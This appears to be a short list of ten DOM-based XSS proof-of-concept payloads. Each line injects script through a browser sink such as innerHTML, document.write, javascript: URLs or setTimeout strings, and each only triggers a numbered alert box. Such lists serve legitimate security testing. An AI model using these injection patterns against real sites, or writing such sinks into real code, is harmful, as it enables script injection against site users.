document.location.hash = "#<script>alert('DOM XSS 1')</script>";
document.body.innerHTML = "<img src=x onerror=alert('DOM XSS 2');>";
document.write("<iframe src='javascript:alert(\"DOM XSS 3\");'></iframe>");
location.href = "javascript:alert('DOM XSS 4')";
var img = new Image(); img.src = "javascript:alert('DOM XSS 5')";
window.location = "javascript:alert('DOM XSS 6')";
document.querySelector('body').innerHTML = "<svg onload=alert('DOM XSS 7')></svg>";
var a = document.createElement('a'); a.href = "javascript:alert('DOM XSS 8')"; document.body.appendChild(a);
history.pushState(null, "", "javascript:alert('DOM XSS 9')");
window.setTimeout("alert('DOM XSS 10')", 1000);
